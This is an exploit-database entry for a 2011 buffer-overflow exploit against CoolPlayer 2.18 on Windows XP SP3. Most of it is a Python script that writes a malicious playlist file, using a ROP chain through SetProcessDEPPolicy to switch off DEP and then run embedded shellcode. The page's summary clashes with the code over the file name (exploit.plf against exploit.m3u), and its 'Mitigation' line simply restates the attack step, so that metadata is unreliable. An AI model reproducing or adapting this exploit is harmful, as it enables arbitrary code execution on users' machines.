CoolPlayer 2.18 DEP Bypass

vendor:

CoolPlayer

by:

Blake

7.2

CVSS

HIGH

DEP Bypass

119

CWE

Product Name: CoolPlayer

Affected Version From: 2.18

Affected Version To: 2.18

Patch Exists: NO

Related CWE: N/A

CPE: 2.18

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

This exploit uses SetProcessDEPPolicy() to disable DEP for the process. It creates a file exploit.plf which contains a payload of 220 bytes of 'A' followed by the address of POP ECX / RETN - SHELL32.DLL 7C9FB028, 4 bytes of 'B', 10 bytes of NOP, ROP chain to set EBX to 0xFFFFFFFF, EBP to point to SetProcessDEPPolicy, EAX to 0x00000001 and EDX to 0x00000000, and finally shellcode.

Mitigation:

Disable DEP for the process

Source

Exploit-DB raw data:

# Exploit Title: CoolPlayer 2.18 DEP Bypass
# Date: January 2, 2011
# Author: Blake
# Version: 2.18
# Tested on: Windows XP SP3 running in Virtualbox
# Uses SetProcessDEPPolicy() to disable DEP for the process
# Thanks to mr_me for the encouragement
# Exploit-DB Notes: May not work on all Win XP SP3 machines

print "\n============================"
print "CoolPlayer 2.18 DEP Bypass"
print "Written by Blake"
print "============================\n"

# windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available
shellcode =(
"\xda\xda\xd9\x74\x24\xf4\xbf\xe7\x18\x22\xfb\x2b\xc9\xb1\x33"
"\x5e\x31\x7e\x17\x83\xee\xfc\x03\x99\x0b\xc0\x0e\x99\xc4\x8d"
"\xf1\x61\x15\xee\x78\x84\x24\x3c\x1e\xcd\x15\xf0\x54\x83\x95"
"\x7b\x38\x37\x2d\x09\x95\x38\x86\xa4\xc3\x77\x17\x09\xcc\xdb"
"\xdb\x0b\xb0\x21\x08\xec\x89\xea\x5d\xed\xce\x16\xad\xbf\x87"
"\x5d\x1c\x50\xa3\x23\x9d\x51\x63\x28\x9d\x29\x06\xee\x6a\x80"
"\x09\x3e\xc2\x9f\x42\xa6\x68\xc7\x72\xd7\xbd\x1b\x4e\x9e\xca"
"\xe8\x24\x21\x1b\x21\xc4\x10\x63\xee\xfb\x9d\x6e\xee\x3c\x19"
"\x91\x85\x36\x5a\x2c\x9e\x8c\x21\xea\x2b\x11\x81\x79\x8b\xf1"
"\x30\xad\x4a\x71\x3e\x1a\x18\xdd\x22\x9d\xcd\x55\x5e\x16\xf0"
"\xb9\xd7\x6c\xd7\x1d\xbc\x37\x76\x07\x18\x99\x87\x57\xc4\x46"
"\x22\x13\xe6\x93\x54\x7e\x6c\x65\xd4\x04\xc9\x65\xe6\x06\x79"
"\x0e\xd7\x8d\x16\x49\xe8\x47\x53\xab\x19\x5a\x49\x3c\x80\x0f"
"\x30\x20\x33\xfa\x76\x5d\xb0\x0f\x06\x9a\xa8\x65\x03\xe6\x6e"
"\x95\x79\x77\x1b\x99\x2e\x78\x0e\xfa\xb1\xea\xd2\xd3\x54\x8b"
"\x71\x2c")


buffer = "\x41" * 220
eip = "\x28\xb0\x9f\x7c"				# POP ECX / RETN - SHELL32.DLL 7C9FB028
offset1 = "\x42" * 4
nop = "\x90" * 10

# put zero in EBX
rop = "\xdd\xad\x9e\x7c"				# POP EBX / RETN - SHELL32.DLL 7C9EADDD
rop += "\xff\xff\xff\xff"				# placed into ebx
rop += "\xe1\x27\xc1\x77"				# INC EBX / RETN - MSVCRT.DLL 77C127E1

# set EBP to point to SetProcessDEPPolicy
rop += "\x7b\xa6\x9e\x7c"				# POP EBP / RETN - SHELL32.DLL 7C9EA67B
rop += "\xa4\x22\x86\x7c"				# address of SetProcessDEPPolicy XP SP3

# set EDI as a pointer to RET (rop nop)
rop += "\x47\xeb\x9e\x7c"				# POP EDI / RETN - SHELL32.DLL 7C9EEB47
rop += "\x08\x15\x9c\x7c"				# RETN - SHELL32.DLL 7C9C1508			

# set ESI as a pointer to RET (rop nop)
rop += "\x4c\x20\x9c\x7c"				# POP ESI / RETN - SHELL32.DLL 7C9C204C
rop += "\x51\x20\x9c\x7c"				# RETN - SHELL32.DLL 7C9C2051			

# set ESP to point at nops
rop += "\x73\x10\xa1\x7c"				# PUSHAD / RETN - SHELL32.DLL 7CA11073

print "[*] Creating malicious m3u file"
try:
	file = open("exploit.m3u","w")
	file.write(buffer + eip + offset1 + rop + nop + shellcode)
	file.close()
	print "[*] File created"
except:
	print "[x] Error creating file!"

raw_input("\nPress any key to exit...")